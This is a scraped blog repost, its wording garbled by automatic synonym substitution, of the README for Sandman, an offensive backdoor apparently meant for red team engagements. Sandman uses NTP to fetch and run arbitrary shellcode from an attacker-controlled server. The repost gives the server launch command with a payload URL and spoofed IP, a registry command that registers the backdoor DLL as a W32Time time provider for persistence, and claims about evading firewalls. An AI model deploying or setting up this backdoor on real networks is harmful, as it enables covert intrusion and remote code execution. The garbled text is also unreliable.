Friday, October 28, 2022
HomeHackerNTP Based mostly Backdoor For Crimson Crew Engagements In Hardened Networks

NTP Based mostly Backdoor For Crimson Crew Engagements In Hardened Networks




Sandman is a backdoor that’s meant to work on hardened networks throughout pink staff engagements.

Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.

Since NTP is a protocol that’s missed by many defenders leading to extensive community accessibility.

Utilization

SandmanServer (Utilization)

Run on home windows / *nix machine:

python3 sandman_server.py "Community Adapter" "Payload Url" "non-obligatory: ip to spoof"

SandmanBackdoor (Utilization)

To begin, you possibly can compile the SandmanBackdoor as talked about beneath, as a result of it’s a single light-weight C# executable you possibly can execute it through ExecuteAssembly, run it as an NTP supplier or simply execute/inject it.

SandmanBackdoorTimeProvider (Utilization)

To make use of it, you’ll need to observe easy steps:

  • Add the next registry worth:
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeTimeProvidersNtpClient" /v DllName /t REG_SZ /d "C:PathToTheDll.dll"
  • Restart the w32time service:
sc cease w32time
sc begin w32time

NOTE: Ensure you are compiling with the x64 choice and never any CPU choice!

Capabilities

  • Getting and executing an arbitrary payload from an attacker’s managed server.

  • Can work on hardened networks since NTP is normally allowed in FW.

  • Impersonating a legit NTP server through IP spoofing.

Setup

SandmanServer (Setup)

SandmanBackdoor (Setup)

To compile the backdoor I used Visible Studio 2022, however as talked about within the utilization part it may be compiled with each VS2022 and CSC. You’ll be able to compile it both utilizing the USE_SHELLCODE and use Orca’s shellcode or with out USE_SHELLCODE to make use of WebClient.

SandmanBackdoorTimeProvider (Setup)

To compile the backdoor I used Visible Studio 2022, additionally, you will want to put in DllExport (through Nuget or another method) to compile it. You’ll be able to compile it both utilizing the USE_SHELLCODE and use Orca’s shellcode or with out USE_SHELLCODE to make use of WebClient.

IOCs

Contributes

Due to those that already contributed and I am going to fortunately settle for contributions, make a pull request and I’ll evaluation it!



RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments